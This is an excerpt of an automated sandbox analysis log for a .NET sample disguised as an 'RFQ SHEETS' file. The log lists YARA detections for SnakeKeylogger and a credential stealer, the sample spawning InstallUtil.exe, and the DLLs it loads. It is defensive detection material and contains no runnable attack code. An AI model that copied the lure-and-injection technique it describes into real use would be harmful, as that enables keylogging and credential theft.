                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_0669E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_0669DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_0669EAF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669E6AF5_2_0669E6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669E6A05_2_0669E6A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669E6B05_2_0669E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669EF605_2_0669EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669EF515_2_0669EF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066993285_2_06699328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06690B205_2_06690B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669EB085_2_0669EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06698BA05_2_06698BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669F3B85_2_0669F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669178F5_2_0669178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06698B905_2_06698B90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669FC685_2_0669FC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066900405_2_06690040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669FC5F5_2_0669FC5F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669F8025_2_0669F802
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066900065_2_06690006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066950185_2_06695018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669F8105_2_0669F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D0F85_2_0669D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669CCA05_2_0669CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669CC8F5_2_0669CC8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D5405_2_0669D540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D5505_2_0669D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669DDFF5_2_0669DDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669DDF15_2_0669DDF1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D9A85_2_0669D9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D9995_2_0669D999
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Static PE information: invalid certificate
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2479444618.0000000008080000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRP8SH.dll6 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameVeloritaApp.dll8 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2462750142.000000000149E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000000.1733485715.0000000000D7A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSky Email Verifier.exeF vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameVeloritaApp.dll8 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2463896944.000000000358E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Binary or memory string: OriginalFilenameSky Email Verifier.exeF vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | File read: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Source: unknown | Process created: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe "C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe"
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
